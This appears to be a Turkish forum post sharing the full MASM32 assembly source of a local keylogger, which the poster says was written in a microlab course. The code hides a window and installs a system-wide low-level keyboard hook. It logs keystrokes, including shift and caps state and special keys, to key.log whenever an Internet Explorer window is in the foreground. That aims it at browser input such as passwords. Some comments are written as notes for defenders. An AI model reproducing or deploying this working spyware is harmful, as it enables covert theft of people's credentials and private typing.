işte masm32 ortamında yazılmış bir local keylogger örneği. bizzat microlab dersinde yazdık. el emeği göz nuru

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

; Layout of the record a WH_KEYBOARD_LL hook receives through lParam
; (keybproc reads vkCode, scanCode and dwFlags from it). Declared here by
; hand; field order matches the Win32 KBDLLHOOKSTRUCT.
KBDLLHOOKSTRUCT STRUCT

vkCode DWORD ?      ; virtual-key code of the key event
scanCode DWORD ?    ; hardware scan code
dwFlags DWORD ?     ; extended-key / injected / alt-down / up flags
time DWORD ?        ; event time stamp
dwExtraInfo DWORD ? ; extra information associated with the message

KBDLLHOOKSTRUCT ENDS

keybproc PROTO DWORD, DWORD, DWORD

.data

file HANDLE 0          ; handle of the open log file (CreateFile in main)
buffer_offset DWORD 0  ; number of bytes currently pending in `buffer`
caps_lock_on BOOL 0    ; 1 while VK_CAPITAL is physically held (suppresses repeat toggles)
shift BOOL 0           ; 1 while either shift key is held
caps BOOL 0            ; tracked caps-lock toggle state

.const

; Fixed strings. For anyone analysing this sample these are its static
; artifacts: the hidden window class name, the log file name (created in
; the process's current directory), the start/stop markers and timestamp
; format that shape the log, and the window-title filter string.
class_name db "kLogger", 0
log_file db "key.log", 0
logger_started db "Logger started ", 0
logger_stopped db 13, 10, "Logger stopped ", 0
format_time db "%02d.%02d.%d %02d:%02d (UTC)" ,13,10,0
error db "Error",0
ie_title db "Internet Explorer",0



.data?
buffer db 32 dup(?)  ; 32-byte staging buffer for logged keystrokes
hinst HINSTANCE ?    ; module handle, set at `start`
written DWORD ?      ; byte count returned by WriteFile (not checked)
ghwnd HWND ?         ; handle of the hidden window created in main




.code
; Program entry: record the module handle, run main, exit with its result.
start:
invoke GetModuleHandle,NULL
mov hinst,eax
call main
invoke ExitProcess,eax


;-----------------------------------------------------------------------
; main
; Opens log_file (creating it if missing, appending if it exists), writes
; the start marker and a timestamp, registers an invisible window of
; class class_name, installs a WH_KEYBOARD_LL hook (keybproc) and runs
; the message loop until WM_QUIT. On exit it unhooks, flushes the key
; buffer, writes the stop marker and timestamp, and closes the file.
; Out: eax = wParam of the WM_QUIT message (used as process exit code);
;      on the early error paths eax is whatever MessageBox returned.
; Defender notes: the host-observable artifacts are the CreateFile on
; log_file, RegisterClassEx/CreateWindowEx of a window that is never
; shown, and the SetWindowsHookEx(WH_KEYBOARD_LL, ...) registration.
; F10 (handled in keybproc) closes the hidden window and ends the loop.
;-----------------------------------------------------------------------
main proc
LOCAL wc:WNDCLASSEX
LOCAL hook:HHOOK
LOCAL msg:MSG

; OPEN_ALWAYS: open an existing file or create it; GetLastError tells which
invoke CreateFile, addr log_file,GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov file,eax
.IF(eax== INVALID_HANDLE_VALUE)
invoke MessageBox, NULL, addr error, addr error, MB_OK
ret
.ENDIF
invoke GetLastError
.IF (eax==ERROR_ALREADY_EXISTS)
; existing log: move to the end so new entries are appended
invoke SetFilePointer,file,0,NULL,FILE_END
.ENDIF

; 15 = length of logger_started
invoke WriteFile,file,addr logger_started,15, addr written,NULL
call time2log

; window class for the hidden window that owns the message loop
mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc,offset main_wnd
mov wc.cbClsExtra, NULL
mov wc.cbWndExtra, WS_EX_CONTROLPARENT
push hinst
pop wc.hInstance
mov wc.hbrBackground, COLOR_BTNFACE+1
mov wc.lpszMenuName, NULL
mov wc.lpszClassName,offset class_name
mov wc.hIcon,NULL
mov wc.hIconSm,NULL
mov wc.hCursor,NULL
invoke RegisterClassEx,addr wc


.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF


; zero-size window, never shown; it only exists to receive WM_CLOSE
invoke CreateWindowEx, NULL, addr class_name, NULL, 0, 0, 0, 0, 0, NULL, NULL, hinst, NULL

.IF(!eax)

invoke MessageBox, NULL, addr error,addr error,MB_OK
ret
.ENDIF



mov ghwnd, eax
; seed the tracked caps-lock state from the current toggle state
invoke GetKeyState, VK_CAPITAL

.IF(eax)

mov caps, 1
.ENDIF


; low-level keyboard hook; keybproc runs for every key event system-wide
invoke SetWindowsHookEx, WH_KEYBOARD_LL, addr keybproc, hinst, NULL
mov hook, eax


; message loop; a WH_KEYBOARD_LL hook needs this thread to pump messages
.WHILE TRUE
invoke GetMessage, addr msg, NULL, 0,0
.BREAK .IF(!eax)
invoke TranslateMessage, addr msg
invoke DispatchMessage, addr msg

.ENDW



; teardown: unhook, write out pending keys, stop marker, timestamp
invoke UnhookWindowsHookEx, hook
call flush_buffer
invoke WriteFile, file, addr logger_stopped, 17, addr written, NULL
call time2log

invoke CloseHandle, file


mov eax,msg.wParam
ret


main endp




;-----------------------------------------------------------------------
; main_wnd
; Window procedure of the hidden window. WM_CLOSE posts WM_QUIT, which
; ends the message loop in main; every other message goes to
; DefWindowProc and its result is returned.
;-----------------------------------------------------------------------
main_wnd proc hwnd:HWND, msg:UINT, wparam:WPARAM, lparam:LPARAM

.IF(msg==WM_CLOSE)
invoke PostQuitMessage, NULL
.ELSE

invoke DefWindowProc, hwnd, msg, wparam, lparam
ret
.ENDIF


xor eax,eax
ret
main_wnd endp



;-----------------------------------------------------------------------
; ie_active
; Out: eax = 1 if the foreground window's title ends with ie_title
;      (case-insensitive: lstrcmpi is tried from every offset of the
;      title text), otherwise 0.
; keybproc consults this so that key events are only recorded while
; such a window is in the foreground.
;-----------------------------------------------------------------------
ie_active proc

local hwnd: HWND
local text[256]: BYTE
local i: UINT
local j: UINT


call GetForegroundWindow
mov hwnd, eax

invoke GetWindowText, hwnd, addr text, SIZEOF text
mov i, eax ; i = number of offsets still to try (title length)
mov j,0    ; j = current offset into text

.WHILE(i)

mov ebx, j
invoke lstrcmpi, addr text[ebx], addr ie_title
.IF(!eax)

; lstrcmpi returned 0: the remainder of the title equals ie_title
mov eax, 1
ret
.ENDIF
dec i
inc j
.ENDW


xor eax, eax
ret

ie_active endp









;-----------------------------------------------------------------------
; keybproc
; Callback installed by SetWindowsHookEx(WH_KEYBOARD_LL) in main.
; In:  code   = hook code (only HC_ACTION is handled)
;      wparam = WM_KEYDOWN / WM_KEYUP
;      lparam = pointer to KBDLLHOOKSTRUCT
; Out: eax = result of CallNextHookEx (the event is always passed on)
; Behaviour: acts only while ie_active reports the target window in the
; foreground. F10 posts WM_CLOSE to the hidden window (stops the logger).
; Shift and caps-lock are tracked in `shift`/`caps`; digits, letters and
; space/tab/return are appended to `buffer` as characters, any other key
; as "[<key name>]" (with '!' after '[' while shift is held). The buffer
; is flushed to the log file once fewer than 16 bytes remain.
;-----------------------------------------------------------------------
keybproc proc code DWORD, wparam:WPARAM, lparam: LPARAM

call ie_active
.IF (eax && (code == HC_ACTION))
mov ebx, lparam
assume ebxtr KBDLLHOOKSTRUCT
mov edx, [ebx].vkCode ; edx = virtual-key code for the rest of the handler
.IF (wparam ==WM_KEYDOWN)
; if user hits f10 , we shut down
.IF (edx == VK_F10)
invoke PostMessage, ghwnd, WM_CLOSE, NULL, NULL
ret
.ENDIF

; keep track of shift and capslock

.IF (edx == VK_LSHIFT || edx ==VK_RSHIFT)
mov shift, 1
.ELSEIF (edx == VK_CAPITAL)
.IF (!caps_lock_on)
; toggle caps true/ false
xor caps, 1
mov caps_lock_on, 1 ; ignore auto-repeat until the key is released (see WM_KEYUP)
.ENDIF
.ELSE
;write to file if buffer might overflow
; buffer is 32 bytes; flush when fewer than 16 remain
.IF (buffer_offset >=32-16)
call flush_buffer
.ENDIF

mov ecx, buffer_offset ; ecx = write position in buffer

.IF (edx == VK_SPACE|| edx == VK_RETURN || edx == VK_TAB)
; these VK codes coincide with their ASCII characters, store as-is
mov buffer[ecx], dl
inc ecx
.ELSEIF (!shift && (edx>2Fh && edx < 3Ah))
; 0..9
mov buffer[ecx], dl
inc ecx
.ELSEIF (edx > 40h && edx < 5Bh)
; A..Z: lower-case unless exactly one of shift / caps is active
mov eax, shift
xor eax , caps
.IF (!eax)
or edx, 20h
.ENDIF

mov buffer[ecx], dl
inc ecx
.ELSE
; any other key: "[name]" from GetKeyNameText, '!' marks shift held

mov buffer[ecx], '['
inc ecx
.IF (shift)
mov buffer[ecx], '!'
inc ecx
.ENDIF

push ecx ; keep the write position across the call
mov eax , 32-1
sub eax, ecx
push eax ; cchSize = room left in buffer
lea eax, buffer[ecx]
push eax ; lpString = current write position
mov edx, [ebx].scanCode
mov eax, [ebx].dwFlags
shl edx , 16
shl eax , 24
or edx, eax ; lParam: scan code in bits 16-23, flags in the top byte
push edx
call GetKeyNameText
pop ecx
add ecx, eax ; advance by the number of characters written
mov buffer[ecx], ']'
inc ecx
.ENDIF
mov buffer_offset, ecx
.ENDIF
.ELSEIF (wparam== WM_KEYUP)
; key release: clear shift, or re-arm caps-lock toggling
.IF (edx == VK_LSHIFT || edx == VK_RSHIFT)
mov shift, 0
.ELSE
mov caps_lock_on, 0
.ENDIF
.ENDIF

assume ebx: nothing
.ENDIF

; always pass the event along the hook chain
invoke CallNextHookEx , NULL, code, wparam, lparam

ret
keybproc endp
;-----------------------------------------------------------------------
; time2log
; Formats the current system time (GetSystemTime, i.e. UTC) with
; format_time through wsprintf and appends the resulting line to the
; log file. Called after the start and stop markers in main.
;-----------------------------------------------------------------------
time2log proc
LOCAL SysTime:SYSTEMTIME
LOCAL output[32]:BYTE

;Get current date/time
invoke GetSystemTime,addr SysTime
lea ebx,SysTime
assume ebxtr SYSTEMTIME
; wsprintf arguments are pushed right-to-left; each WORD field is
; zero-extended through eax (eax cleared once, only ax is rewritten)
xor eax,eax
mov ax,[ebx].wSecond
push eax
mov ax,[ebx].wMinute
push eax
mov ax,[ebx].wHour
push eax
mov ax,[ebx].wYear
push eax
mov ax,[ebx].wMonth
push eax
mov ax,[ebx].wDay
push eax
assume ebx:nothing
push offset format_time
lea eax,output
push eax
call wsprintf ; eax = number of characters produced

;Write it to the log file
invoke WriteFile, file,addr output, eax, addr written, NULL
ret

time2log endp

;-----------------------------------------------------------------------
; flush_buffer
; Appends the pending bytes in `buffer` (buffer_offset of them) to the
; log file and resets buffer_offset; a no-op when nothing is pending.
;-----------------------------------------------------------------------
flush_buffer proc
;Write buffered data to log file
.IF (buffer_offset!=0)
invoke WriteFile,file,addr buffer, buffer_offset,addr written,NULL

mov buffer_offset,0
.ENDIF
ret
flush_buffer endp
end start


